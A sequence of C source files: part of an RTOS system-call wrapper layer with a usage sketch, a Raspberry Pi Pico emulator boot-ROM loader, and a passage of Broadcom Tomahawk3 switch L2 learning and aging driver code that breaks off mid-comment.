	DKFPRINTF(0x01, "mutex = \"%s\" %p\n", mutex->name, mutex);

	param.mutex	= mutex;

	DKPRINTF(0x01, "exec param = %p\n", &param);
	DKPRINTF(0x01, "mutex = %p\n", param.mutex);

	sys_call(SYSCALL_MUTEX_UNLOCK, (void *)&param);

	return param.ret;
}

/**
   @brief	Unregister a MUTEX

   @param[in]	mutex	Pointer to the MUTEX
*/
void mutex_unregister(struct st_mutex *mutex)
{
	DKFPRINTF(0x01, "mutex = \"%s\" %p\n", mutex->name, mutex);

	sys_call(SYSCALL_MUTEX_DISPOSE, (void *)mutex);
}


/* Console I/O configuration */

/**
   @brief	Set the standard input device of the running task

   @param[in]	dev	Device

   @remarks	If dev is 0, the system default standard input device is set.
*/
void set_console_in_device(struct st_device *dev)
{
	DKFPRINTF(0x01, "dev = \"%s\" %p\n", dev->name, dev);

	sys_call(SYSCALL_SET_CONSOLE_IN, (void *)dev);
}

/**
   @brief	Set the standard output device of the running task

   @param[in]	dev	Device

   @remarks	If dev is 0, the system default standard output device is set.
*/
void set_console_out_device(struct st_device *dev)
{
	DKFPRINTF(0x01, "dev = \"%s\" %p\n", dev->name, dev);

	sys_call(SYSCALL_SET_CONSOLE_OUT, (void *)dev);
}

/**
   @brief	Set the error output device of the running task

   @param[in]	dev	Device

   @remarks	If dev is 0, the system default standard error output device is set.
*/
void set_error_out_device(struct st_device *dev)
{
	DKFPRINTF(0x01, "dev = \"%s\" %p\n", dev->name, dev);

	sys_call(SYSCALL_SET_ERROR_OUT, (void *)dev);
}


/* Debug APIs */

int task_get_tasks_info(struct st_task_info *ti, int count)
{
	volatile struct st_task_info_param param;

	DKFPRINTF(0x01, "\n");

	param.ti = ti;
	param.count = count;

	sys_call(SYSCALL_GET_TASKS_INFO, (void *)&param);

	return param.ret;
}

void print_task_list(void)
{
	DKFPRINTF(0x01, "\n");

	sys_call(SYSCALL_PRINT_TASK_LIST, (void *)0);
}

void print_task_queue(void)
{
	DKFPRINTF(0x01, "\n");

	sys_call(SYSCALL_PRINT_TASK_QUEUE, (void *)0);
}

void print_call_trace(void)
{
	DKFPRINTF(0x01, "\n");

	sys_call(SYSCALL_PRINT_CALLTRACE, (void *)0);
}
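/*
 * Editor's note: a usage sketch of the APIs above -- starting a task with
 * task_exec() and blocking on an event queue. The stack size, priority,
 * one-byte event payload and the task_func signature (assumed here to be
 * int (*)(void *)) are illustrative, not project defaults.
 */
static struct st_tcb demo_tcb;
static unsigned int demo_stack[1024 / sizeof(unsigned int)];
static struct st_event demo_evt;
static unsigned char demo_evt_args[4];	/* room for 4 queued 1-byte events */

static int demo_task(void *arg)
{
	unsigned char ev;

	eventqueue_register(&demo_evt, "demo_evt", demo_evt_args, 1, 4);

	for(;;) {
		/* sleep in EVENT_WAIT until event_wakeup(&demo_evt, ...) is
		   called or a 1000 ms timeout; >= 0 means an event arrived */
		if(event_wait(&demo_evt, &ev, 1000) >= 0) {
			/* ev now holds the posted payload byte */
		}
	}

	return 0;
}

void demo_start(void)
{
	task_exec(demo_task, "demo", 1, &demo_tcb,
		  demo_stack, sizeof(demo_stack), 0);
}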
521851.c
#include "pico_rom.h" #include "config.h" #include "pico_cpu.h" #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> bool is_valid_rom_addr(pico_addr addr) { return (addr - PICO_ROM_ADDR) < PICO_ROM_SIZE; } int read_rom_8(pico_addr raw_addr, struct pico_cpu *cpu, uint8_t *target, struct memory_region *self) { uint8_t *v = self->data + (raw_addr); *target = *v; return 0; } int read_rom_16(pico_addr raw_addr, struct pico_cpu *cpu, uint16_t *target, struct memory_region *self) { uint16_t *v = (uint16_t *)(self->data + (raw_addr)); *target = *v; return 0; } int read_rom_32(pico_addr raw_addr, struct pico_cpu *cpu, uint32_t *target, struct memory_region *self) { uint32_t *v = (uint32_t *)(self->data + (raw_addr)); *target = *v; return 0; } int init_rom(struct pico_cpu *cpu) { FILE *f = fopen("bootrom", "rb"); if (f == NULL) { printf("error while reading bootrom...\n"); return -1; } fseek(f, 0, SEEK_END); long fsize = ftell(f); fseek(f, 0, SEEK_SET); if (fsize > PICO_ROM_SIZE) { printf("pico bootrom size is %li and should be below %i \n", fsize, PICO_ROM_SIZE); fclose(f); return -2; } struct memory_region *mem_region = malloc(sizeof(struct memory_region)); mem_region->data = malloc(PICO_ROM_SIZE); mem_region->data_size = PICO_ROM_SIZE; mem_region->data_is_malloc = true; fread(mem_region->data, 1, fsize, f); fclose(f); mem_region->can_write = false; mem_region->can_read = true; mem_region->name = "ROM"; mem_region->start = PICO_ROM_ADDR; mem_region->size = PICO_ROM_SIZE; mem_region->read8 = read_rom_8; mem_region->read16 = read_rom_16; mem_region->read32 = read_rom_32; mem_region->write8 = NULL; mem_region->write16 = NULL; mem_region->write32 = NULL; add_dynamic_memory_region(&cpu->regions, mem_region); return 0; } bool init_boot_rom_vector(struct pico_bootrom_vector *target, struct pico_cpu *cpu) { size_t length_to_read = sizeof(struct pico_bootrom_vector); uint8_t *raw_target = malloc(sizeof(struct pico_bootrom_vector)); for (uint32_t i = 0; i < length_to_read; i++) { if (read_memory_byte(cpu, raw_target + i, i) != 0) { return 0; } } memcpy(target, raw_target, length_to_read); free(raw_target); return true; }
247690.c
/**************************************************************************** * * This license is set out in https://raw.githubusercontent.com/Broadcom-Network-Switching-Software/OpenBCM/master/Legal/LICENSE file. * * Copyright 2007-2019 Broadcom Inc. All rights reserved. * */ #include <shared/bsl.h> #include <sal/core/libc.h> #include <sal/types.h> #include <shared/bsl.h> #include <soc/drv.h> #include <soc/l2x.h> #include <soc/ptable.h> #include <soc/debug.h> #include <soc/util.h> #include <soc/mem.h> #include <soc/iproc.h> #include <soc/mcm/intr_iproc.h> #include <soc/tomahawk3.h> #if defined(BCM_TOMAHAWK3_SUPPORT) #ifdef BCM_XGS_SWITCH_SUPPORT /* Size of AVL table used for learning entries */ #define _SOC_TH3_L2_LRN_TBL_SIZE 8192 #define SOC_MEM_COMPARE_RETURN(a, b) { \ if ((a) < (b)) { return -1; } \ if ((a) > (b)) { return 1; } \ } typedef struct soc_l2_lrn_avl_info_s { vlan_id_t vlan; soc_module_t mod; int dest_type; /* 0=dest. is port, 1=dest. is trunk */ int port_tgid; /* Holds port num if dest_type is 0. Holds TGID if dest_type is 1 */ sal_mac_addr_t mac; int in_hw; /* Entry programmed in h/w. Used to avoid hits due to duplicate pkts */ } soc_l2_lrn_avl_info_t, *soc_l2_lrn_avl_info_p; static int _soc_th3_l2_bulk_age_iter[SOC_MAX_NUM_DEVICES] = {0}; static uint8 rev_id = 0; static uint16 dev_id = 0; /* * Function: * soc_th3_l2x_shadow_callback * Purpose: * Internal callback routine for updating an AVL tree shadow table * Parameters: * unit - StrataSwitch unit number. * entry_del - Entry to be deleted or updated, NULL if none. * entry_add - Entry to be inserted or updated, NULL if none. * fn_data - unused. * Notes: * Used only if L2X shadow table is enabled. */ STATIC void soc_th3_l2x_shadow_callback(int unit, int flags, l2x_entry_t *entry_del, l2x_entry_t *entry_add, void *fn_data) { soc_control_t *soc = SOC_CONTROL(unit); if (flags & (SOC_L2X_ENTRY_DUMMY | SOC_L2X_ENTRY_NO_ACTION | SOC_L2X_ENTRY_OVERFLOW)) { return; } /* Since sync thread (bcmL2X) updates both its own database and learn * shadow database, we make sure both threads are running, and are synced * together */ if ((soc->l2x_pid != SAL_THREAD_ERROR) && (soc->arlShadowMutex != NULL) && (soc->arlShadow != NULL) && (soc->l2x_learn_pid != SAL_THREAD_ERROR) && (soc->l2x_lrn_shadow_mutex != NULL)) { int rv; sal_mutex_take(soc->arlShadowMutex, sal_mutex_FOREVER); if (entry_del != NULL) { rv = shr_avl_delete(soc->arlShadow, soc_l2x_entry_compare_key, (shr_avl_datum_t *)entry_del); if (rv == 0) { sal_mac_addr_t mac; vlan_id_t vlan; int dest; soc_mem_mac_addr_get(unit, L2Xm, entry_del, MAC_ADDRf, mac); vlan = soc_mem_field32_get(unit, L2Xm, entry_del, VLAN_IDf); dest = soc_mem_field32_get(unit, L2Xm, entry_del, DESTINATIONf); LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "AVL delete: datum not found:\n dest %d, vlan %d," " mac(hex) %02X:%02X:%02X:%02X:%02X:%02X\n"), dest, vlan, mac[0], mac[1], mac[2], mac[3], mac[4], mac[5])); } } if (entry_add != NULL) { shr_avl_insert(soc->arlShadow, soc_l2x_entry_compare_key, (shr_avl_datum_t *)entry_add); } sal_mutex_give(soc->arlShadowMutex); /* Update shadow learn table after successful h/w update(s) */ /* Note the order of delete and insert below is important, since for * station move condition in _soc_th3_learn_cache_entry_process, we * delete an entry first and then insert it with the new port info */ sal_mutex_take(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex, sal_mutex_FOREVER); if (entry_del != NULL) { soc_th3_lrn_shadow_delete(unit, entry_del); } if (entry_add != NULL) { 
soc_th3_lrn_shadow_insert(unit, entry_add); } sal_mutex_give(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex); } } /* * Function: * soc_th3_l2x_detach * Purpose: * Deallocate L2X subsystem resources * Parameters: * unit - StrataSwitch unit number. * Returns: * SOC_E_XXX * Notes: * Learn cache interrupt is disabled. Learn cache is cleared, learn cache * status bits are cleared */ int soc_th3_l2x_detach(int unit) { soc_control_t *soc = SOC_CONTROL(unit); /* Free reources allocated for shadow table */ soc_l2x_unregister(unit, soc_th3_l2x_shadow_callback, NULL); /* Free cml_freeze structure */ _soc_l2x_cml_struct_free(unit); if (soc->arlShadow != NULL) { shr_avl_destroy(soc->arlShadow); soc->arlShadow = NULL; } if (soc->arlShadowMutex != NULL) { sal_mutex_destroy(soc->arlShadowMutex); soc->arlShadowMutex = NULL; } return SOC_E_NONE; } /* * Function: * soc_th3_l2x_attach * Purpose: * Allocate L2X subsystem resources * Parameters: * unit - StrataSwitch unit number. * Returns: * SOC_E_XXX * Notes: * The L2X tree shadow table is always allocated, since it will be used in * learning, aging and table management. Value of spn_L2XMSG_AVL will be * ignored */ int soc_th3_l2x_attach(int unit) { soc_control_t *soc = SOC_CONTROL(unit); int datum_bytes, datum_max; (void)soc_th3_l2x_detach(unit); datum_bytes = sizeof (l2x_entry_t); datum_max = soc_mem_index_count(unit, L2Xm); if (shr_avl_create(&soc->arlShadow, INT_TO_PTR(unit), datum_bytes, datum_max) < 0) { return SOC_E_MEMORY; } if ((soc->arlShadowMutex = sal_mutex_create("asMutex")) == NULL) { (void)soc_l2x_detach(unit); return SOC_E_MEMORY; } soc_l2x_register(unit, soc_th3_l2x_shadow_callback, NULL); /* Reset l2 freeze structure */ soc_th3_l2x_reset_freeze_state(unit); /* Allocate cml freeze structure */ SOC_IF_ERROR_RETURN(_soc_l2x_cml_struct_alloc(unit)); return SOC_E_NONE; } /* * Function: * _soc_th3_l2_age_entries_process * Purpose: * This function is invoked as part of aging mechanism to check for hit bits * and take appropriate action (either clear the hit bits, or delete the entry) * Since there is no h/w aging support, nor do we have bulk operations block in * hardware's L2 implementation, this function reads L2X entries, and takes * decision one entry at a time * Parameters: * unit - unit number * Returns: * SOC_E_NONE on success, or other SOC_E_* error code on failure * Notes: * This function will execute much slower than other devices that have * hardware support for aging. Entries are processed one at a time */ STATIC int _soc_th3_l2_age_entries_process(int unit, l2x_entry_t *l2x_entries) { uint32 index_min, index_max, count; int i; int rv; index_min = soc_mem_index_min(unit, L2Xm); index_max = soc_mem_index_max(unit, L2Xm); count = soc_mem_index_count(unit, L2Xm); sal_memset((void *)l2x_entries, 0, sizeof(l2x_entry_t) * count); /* Read L2 table */ soc_mem_lock(unit, L2Xm); rv = soc_mem_read_range(unit, L2Xm, MEM_BLOCK_ANY, index_min, index_max, l2x_entries); soc_mem_unlock(unit, L2Xm); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:DMA read failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); /* We do not return error, otherwise thread will be killed. 
If thread * is alive it can be debugged */ return SOC_E_NONE; } for (i = index_min; i <= index_max; i++) { l2x_entry_t *l2x_entry; uint32 hit_da, hit_sa, local_sa; l2x_entry = soc_mem_table_idx_to_pointer(unit, L2Xm, l2x_entry_t*, l2x_entries, i); /* Skip invalid entry */ if (!soc_L2Xm_field32_get(unit, l2x_entry, BASE_VALIDf)) { continue; } /* Skip static entry */ if (soc_L2Xm_field32_get(unit, l2x_entry, STATIC_BITf)) { continue; } hit_da = soc_L2Xm_field32_get(unit, l2x_entry, HITDAf); hit_sa = soc_L2Xm_field32_get(unit, l2x_entry, HITSAf); local_sa = soc_L2Xm_field32_get(unit, l2x_entry, LOCAL_SAf); /* If no hot bits are set, delete the entry */ if (!(hit_da || hit_sa || local_sa)) { /* Delete entry */ soc_mem_lock(unit, L2Xm); rv = soc_mem_delete(unit, L2Xm, MEM_BLOCK_ALL, (void *)l2x_entry); soc_mem_unlock(unit, L2Xm); if (SOC_FAILURE(rv)) { /* If entry is not found, it has been deleted by other source, * e.g. address delete from application. So we ignore not found * condition here */ if (rv != SOC_E_NOT_FOUND) { LOG_WARN(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:soc mem delete failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); } } } else { /* Clear hit bits */ soc_L2Xm_field32_set(unit, l2x_entry, HITDAf, 0); soc_L2Xm_field32_set(unit, l2x_entry, HITSAf, 0); soc_L2Xm_field32_set(unit, l2x_entry, LOCAL_SAf, 0); soc_mem_lock(unit, L2Xm); rv = soc_mem_write(unit, L2Xm, MEM_BLOCK_ALL, i, (void *)l2x_entry); soc_mem_unlock(unit, L2Xm); if (SOC_FAILURE(rv)) { /* We do not return error, otherwise thread will be killed. If * thread is alive it can be debugged */ LOG_WARN(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:soc mem write failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); } } /* When an entry is deleted, soc_th3_l2x_shadow_callback will call * learn shadow upadate function. 
So we don't call learn shadow update * function here */ } return SOC_E_NONE; } /* * Function: * _soc_th3_l2_age * Purpose: * Handler function for L2 entry aging thread * Parameters: * unit - unit number * Returns: * none */ STATIC void _soc_th3_l2_age(void *unit_ptr) { int unit = PTR_TO_INT(unit_ptr); int c, m, r, rv, iter = 0; soc_control_t *soc = SOC_CONTROL(unit); sal_usecs_t interval; sal_usecs_t stime, etime; l2x_entry_t *buffer; /* Allocate memory to accomodate L2X table */ buffer = soc_cm_salloc(unit, sizeof(l2x_entry_t) * soc_mem_index_count(unit, L2Xm), "L2Xm_age"); if (buffer == NULL) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "_soc_th3_l2_age: " "Memory alloc failed, size %d\n"), (int)(sizeof(l2x_entry_t) * soc_mem_index_count(unit, L2Xm)))); goto cleanup_exit; } while((interval = soc->l2x_age_interval) != 0) { if (!iter) { goto age_delay; } LOG_VERBOSE(BSL_LS_SOC_ARL, (BSL_META_U(unit, "l2_age_thread: " "Process iters(total:%d, this run:%d\n"), ++_soc_th3_l2_bulk_age_iter[unit], iter)); stime = sal_time_usecs(); if (!soc->l2x_age_enable) { goto age_delay; } if (soc_mem_index_count(unit, L2Xm) == 0) { goto cleanup_exit; } rv = _soc_th3_l2_age_entries_process(unit, buffer); if (!SOC_SUCCESS(rv)) { goto cleanup_exit; } etime = sal_time_usecs(); LOG_VERBOSE(BSL_LS_SOC_ARL, (BSL_META_U(unit, "l2_bulk_age_thread: unit=%d: done in %d usec\n"), unit, SAL_USECS_SUB(etime, stime))); age_delay: rv = -1; /* timeout */ if (interval > 2147) { m = (interval / 2147) * 1000; r = (interval % 2147) * 1000000; for (c = 0; c < m; c++) { rv = sal_sem_take(soc->l2x_age_notify, 2147000); /* age interval is changed */ if (rv == 0 || interval != soc->l2x_age_interval) { break; } } /* age interval is changed */ if (soc->l2x_age_interval && (rv == 0 || interval != soc->l2x_age_interval)) { interval = soc->l2x_age_interval; goto age_delay; } else if (r) { /* age interval is not changed */ (void)sal_sem_take(soc->l2x_age_notify, r); } } else { rv = sal_sem_take(soc->l2x_age_notify, interval * 1000000); /* age interval is changed */ if (soc->l2x_age_interval && (rv == 0 || interval != soc->l2x_age_interval)) { interval = soc->l2x_age_interval; goto age_delay; } } iter++; } cleanup_exit: if (buffer != NULL) { soc_cm_sfree(unit, buffer); } LOG_VERBOSE(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "l2_age_thread: exiting\n"))); soc->l2x_age_pid = SAL_THREAD_ERROR; sal_thread_exit(0); /* return; */ } /* * Function: * soc_th3_l2_age_start * Purpose: * Start L2 aging thread * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ int soc_th3_l2_age_start(int unit, int interval) { int cfg_interval; soc_control_t *soc = SOC_CONTROL(unit); cfg_interval = soc_property_get(unit, spn_L2_SW_AGING_INTERVAL, SAL_BOOT_QUICKTURN ? 30 : 10); SOC_CONTROL_LOCK(unit); soc->l2x_age_interval = interval ? 
interval : cfg_interval; sal_snprintf(soc->l2x_age_name, sizeof (soc->l2x_age_name), "bcmL2age.%d", unit); soc->l2x_age_pid = sal_thread_create(soc->l2x_age_name, SAL_THREAD_STKSZ, soc_property_get(unit, spn_L2AGE_THREAD_PRI, 50), _soc_th3_l2_age, INT_TO_PTR(unit)); if (soc->l2x_age_pid == SAL_THREAD_ERROR) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "soc_th3_l2_age_start: Could not start" " L2 aging thread\n"))); SOC_CONTROL_UNLOCK(unit); return SOC_E_MEMORY; } SOC_CONTROL_UNLOCK(unit); return SOC_E_NONE; } /* * Function: * soc_th3_l2_age_stop * Purpose: * Stop l2 aging thread * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ int soc_th3_l2_age_stop(int unit) { soc_control_t *soc = SOC_CONTROL(unit); int rv = SOC_E_NONE; soc_timeout_t to; SOC_CONTROL_LOCK(unit); soc->l2x_age_interval = 0; /* Request exit */ SOC_CONTROL_UNLOCK(unit); if (soc->l2x_age_pid && (soc->l2x_age_pid != SAL_THREAD_ERROR)) { /* Wake up thread so it will check the exit flag */ sal_sem_give(soc->l2x_age_notify); /* Give thread a few seconds to wake up and exit */ if (SAL_BOOT_SIMULATION) { soc_timeout_init(&to, 300 * 1000000, 0); } else { soc_timeout_init(&to, 60 * 1000000, 0); } while (soc->l2x_age_pid != SAL_THREAD_ERROR) { if (soc_timeout_check(&to)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "thread will not exit\n"))); rv = SOC_E_INTERNAL; break; } } } return rv; } /* * Function: * soc_th3_l2_lrn_cache_entry_invalidate * Purpose: * This function clears a specific L2 learn cache entry from a given pipe. * It will be called during learning process to clear entries after they are * learned * Parameters: * unit - unit number * pipe - pipe number (0 based) * entry - entry index with learn cache (0 based) * Returns: * SOC_E_XXX */ STATIC int soc_th3_l2_lrn_cache_entry_invalidate(int unit, int pipe, int entry) { soc_mem_t mem; if ((pipe < 0) || (pipe > (NUM_PIPE(unit) - 1))) { return SOC_E_PARAM; } mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; if ((entry < soc_mem_index_min(unit, mem)) || (entry > soc_mem_index_max(unit, mem))) { return SOC_E_PARAM; } soc_mem_lock(unit, mem); SOC_IF_ERROR_RETURN(soc_mem_write(unit, mem, MEM_BLOCK_ALL, entry, soc_mem_entry_zeroes(unit, mem))); soc_mem_unlock(unit, mem); return SOC_E_NONE; } /* * Function: * soc_th3_l2_learn_cache_clear * Purpose: * This function clears L2 learn cache. All copies of learn cache (in all * pipes) are cleared * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ STATIC int soc_th3_l2_learn_cache_clear(int unit) { int pipe; soc_info_t *si; soc_mem_t mem; si = &SOC_INFO(unit); for (pipe = 0; pipe < NUM_PIPE(unit); pipe++) { if (SOC_PBMP_IS_NULL(si->pipe_pbm[pipe])) { continue; } mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; soc_mem_lock(unit, mem); SOC_IF_ERROR_RETURN(soc_mem_clear(unit, mem, MEM_BLOCK_ALL, TRUE)); soc_mem_unlock(unit, mem); } return SOC_E_NONE; } /* * Function: * soc_th3_l2_learn_cache_status_clear * Purpose: * This function clears L2 learn cache status registers. All copies of learn * cache (in all pipes) are cleared. 
These are sticky bits and need to be * explicitly cleared by software during init or shutdown of L2 module * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ STATIC int soc_th3_l2_learn_cache_status_clear(int unit) { int pipe; soc_reg_t reg = INVALIDr; uint32 rval = 0; reg = SOC_REG_UNIQUE_ACC(unit, L2_LEARN_CACHE_STATUSr)[0]; SOC_IF_ERROR_RETURN(soc_reg32_get(unit, reg, REG_PORT_ANY, 0, &rval)); soc_reg_field_set(unit, reg, &rval, L2_LEARN_CACHE_FULLf, 0x0); soc_reg_field_set(unit, reg, &rval, L2_LEARN_CACHE_THRESHOLD_EXCEEDEDf, 0x0); for (pipe = 0; pipe < NUM_PIPE(unit); pipe++) { reg = SOC_REG_UNIQUE_ACC(unit, L2_LEARN_CACHE_STATUSr)[pipe]; SOC_IF_ERROR_RETURN(soc_reg32_set(unit, reg, REG_PORT_ANY, 0, rval)); } return SOC_E_NONE; } /* * Function: * _soc_th3_l2_learn_cache_status_check_clear * Purpose: * This function checks status of one or more status bits in a pipe's * L2 learn cache status register for the specified pipe. If any bit is set, * it clears the bit(s). These are sticky bits and need to be explicitly * cleared by software * Parameters: * unit - Unit number * pipe - Pipe whose status bit needs to be cleared * fld_ptr - Pointer to an array of one or more fields which are to be cleared * num_flds - Size of fld_ptr array * Returns: * SOC_E_XXX * Notes: * Caller must provide correct pipe number and correct field value(s) */ STATIC int _soc_th3_l2_learn_cache_status_check_clear(int unit, int pipe, soc_field_t *fld_ptr, int num_flds) { soc_reg_t reg = INVALIDr; uint32 rval = 0; uint32 bit_val; int i; int clear; reg = SOC_REG_UNIQUE_ACC(unit, L2_LEARN_CACHE_STATUSr)[pipe]; SOC_IF_ERROR_RETURN(soc_reg32_get(unit, reg, REG_PORT_ANY, 0, &rval)); clear = FALSE; for (i = 0; i < num_flds; i++) { /* Check if a status bit is set. If so clear it, else check next bit */ bit_val = soc_reg_field_get(unit, reg, rval, fld_ptr[i]); if (bit_val) { soc_reg_field_set(unit, reg, &rval, fld_ptr[i], 0x0); clear = TRUE; } } /* Program register only if atleast one bit was modified */ if (clear == TRUE) { SOC_IF_ERROR_RETURN(soc_reg32_set(unit, reg, REG_PORT_ANY, 0, rval)); } return SOC_E_NONE; } /* * Function: * soc_th3_l2_learn_cache_read * Purpose: * This function reads all L2 learn cache entries for a given pipe * Parameters: * unit - unit number * pipe - pipe to read from (range: 0-7) * buffer - Buffer filled by memory read operation * Returns: * SOC_E_XXX * Notes: * Caller must do range check and provide correct pipe number */ STATIC int soc_th3_l2_learn_cache_read(int unit, int pipe, uint32 *buffer) { soc_mem_t mem; uint32 index_min, index_max; int rv; rv = SOC_E_NONE; mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; index_min = soc_mem_index_min(unit, mem); index_max = soc_mem_index_max(unit, mem); soc_mem_lock(unit, mem); /* Read learn cache entries from the specified pipe */ rv = soc_mem_read_range(unit, mem, MEM_BLOCK_ANY, index_min, index_max, buffer); /* Explicitly clear learn cache for rev A0 */ if (SOC_CONTROL(unit)->lrn_cache_clr_on_rd && (rev_id == BCM56980_A0_REV_ID)) { if (rv == SOC_E_NONE) { rv = soc_mem_clear(unit, mem, MEM_BLOCK_ALL, FALSE); } } soc_mem_unlock(unit, mem); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:DMA read failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); } return rv; } /* * Function: * _soc_th3_learn_avl_compare_key * Purpose: * Comparison function for AVL shadow table operations * Parameters: * user_data - User supplied data reuired by AVL library * datum1 - First data item to compare * datum2 - Second data item to compare 
* Returns: * SOC_E_XXX * Notes: * None */ STATIC int _soc_th3_learn_avl_compare_key(void *user_data, shr_avl_datum_t *datum1, shr_avl_datum_t *datum2) { soc_l2_lrn_avl_info_p k1, k2; /* COMPILER_REFERENCE(user_data);*/ k1 = (soc_l2_lrn_avl_info_p)datum1; k2 = (soc_l2_lrn_avl_info_p)datum2; SOC_MEM_COMPARE_RETURN(k1->vlan, k2->vlan); return ENET_CMP_MACADDR(k1->mac, k2->mac); } /* * Function: * soc_th3_lrn_shadow_insert * Purpose: * This function is used to insert an entry in to learn shadow table, * corresponding to the hardware L2 entry added before calling this function. * Since there is no relevance of L2 multicast, static entries and * vlan cross connect entries for learning process we ignore these entry types. * See Notes * Parameters: * unit - Switch unit # * l2x_entry_t - Entry to be inserted in to AVL tree * Returns: * SOC_E_XXX * Notes: * Caller _must_ lock mutex l2x_lrn_shadow_mutex before calling this function */ int soc_th3_lrn_shadow_insert(int unit, l2x_entry_t *entry) { soc_l2_lrn_avl_info_t k; int rv; /* If shadow memory is freed, or not set up, do nothing */ if (SOC_CONTROL(unit)->l2x_lrn_shadow == NULL) { return SOC_E_NONE; } /* If entry is not valid, do not insert in to shadow table */ if (!soc_mem_field32_get(unit, L2Xm, entry, BASE_VALIDf)) { return SOC_E_NONE; } /* Ignore static entry */ if (soc_L2Xm_field32_get(unit, entry, STATIC_BITf)) { return SOC_E_NONE; } /* Do not add single cross connect entries, since they are niether learned, * nor aged */ if (soc_mem_field32_get(unit, L2Xm, entry, KEY_TYPEf) != TH3_L2_HASH_KEY_TYPE_BRIDGE) { return SOC_E_NONE; } sal_memset(&k, 0x0, sizeof(k)); soc_mem_mac_addr_get(unit, L2Xm, entry, MAC_ADDRf, k.mac); /* Do not add multicast entries */ if (SOC_TH3_MAC_IS_MCAST(k.mac)) { return SOC_E_NONE; } k.vlan = soc_mem_field32_get(unit, L2Xm, entry, VLAN_IDf); k.dest_type = soc_mem_field32_get(unit, L2Xm, entry, Tf); k.port_tgid = soc_mem_field32_get(unit, L2Xm, entry, DESTINATIONf); /* Entry has already been added to h/w, so we set in_hw to 'true' */ k.in_hw = TRUE; rv = shr_avl_insert(SOC_CONTROL(unit)->l2x_lrn_shadow, _soc_th3_learn_avl_compare_key, (shr_avl_datum_t *)&k); /* We do not return error since normally there will always be space for a * new entry to add in the tree. If this were not the case, mem insert/write * called before invoking this function will fail. Also, the full condition * may be cleared by software replace mechanism, or aging, or application * deleting L2 entries. Also hardware h/w has already been updated at this * point */ if (rv == -1) { LOG_WARN(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "shr_avl_insert - tree full\n"))); } return SOC_E_NONE; } /* * Function: * soc_th3_lrn_shadow_delete * Purpose: * This function deletes an entry from learn shadow table, * after the hardware L2 entry is deleted. Since there is no relevance of L2 * multicast, static entries and vlan cross connect entries for learning * process we ignore these entry types. 
See Notes * Parameters: * unit - Switch unit # * l2x_entry_t - Entry to be inserted in to AVL tree * Returns: * SOC_E_XXX * Notes: * Caller _must_ lock mutex l2x_lrn_shadow_mutex before calling this function */ int soc_th3_lrn_shadow_delete(int unit, l2x_entry_t *entry) { soc_l2_lrn_avl_info_t k; int rv; /* If shadow memory is freed, or not set up, don't do anything */ if (SOC_CONTROL(unit)->l2x_lrn_shadow == NULL) { return SOC_E_NONE; } #if 0 /* If entry is not valid, do not insert in to shadow table */ if (!soc_mem_field32_get(unit, L2Xm, entry, BASE_VALIDf)) { return SOC_E_NONE; } #endif /* Ignore static entry */ if (soc_L2Xm_field32_get(unit, entry, STATIC_BITf)) { return SOC_E_NONE; } /* Ignore single cross connect entries, since they are niether learned, * nor aged */ if (soc_mem_field32_get(unit, L2Xm, entry, KEY_TYPEf) != TH3_L2_HASH_KEY_TYPE_BRIDGE) { return SOC_E_NONE; } sal_memset(&k, 0x0, sizeof(k)); soc_mem_mac_addr_get(unit, L2Xm, entry, MAC_ADDRf, k.mac); /* Ignore multicast entries */ if (SOC_TH3_MAC_IS_MCAST(k.mac)) { return SOC_E_NONE; } k.vlan = soc_mem_field32_get(unit, L2Xm, entry, VLAN_IDf); k.dest_type = soc_mem_field32_get(unit, L2Xm, entry, Tf); k.port_tgid = soc_mem_field32_get(unit, L2Xm, entry, DESTINATIONf); /* Entry has already been deleted from h/w, so we set in_hw to 'false' */ k.in_hw = FALSE; rv = shr_avl_delete(SOC_CONTROL(unit)->l2x_lrn_shadow, _soc_th3_learn_avl_compare_key, (shr_avl_datum_t *)&k); if (rv == 0) { LOG_INFO(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "shr_avl_delete: Did not find datum\n"))); } return SOC_E_NONE; } /* * Function: * soc_th3_lrn_shadow_show * Purpose: * Debug display function for AVL learn shadow table * Parameters: * user_data - Used to pass StrataSwitch unit # * datum - AVL node to display * extra_data - Unused * Returns: * SOC_E_XXX */ int soc_th3_lrn_shadow_show(void *user_data, shr_avl_datum_t *datum, void *extra_data) { int unit = PTR_TO_INT(user_data); soc_l2_lrn_avl_info_p k = (soc_l2_lrn_avl_info_p)datum; COMPILER_REFERENCE(extra_data); BSL_LOG(BSL_LSS_CLI, (BSL_META_U(unit, "dest_type: %d, port_tgid: %d, mod: %d, in_hw: %d \n"),k->dest_type, k->port_tgid, k->mod, k->in_hw)); BSL_LOG(BSL_LSS_CLI, (BSL_META_U(unit, "mac(in hex) %02X:%02X:%02X:%02X:%02X:%02X, vlan: %d\n"),k->mac[0], k->mac[1], k->mac[2], k->mac[3], k->mac[4], k->mac[5], k->vlan)); LOG_CLI((BSL_META_U(unit, "----------------------------------------\n"))); return SOC_E_NONE; } /* * Function: * _soc_th3_learn_do_lookup * Purpose: * This function searches shadow table for matching key, and sets passed * arguments 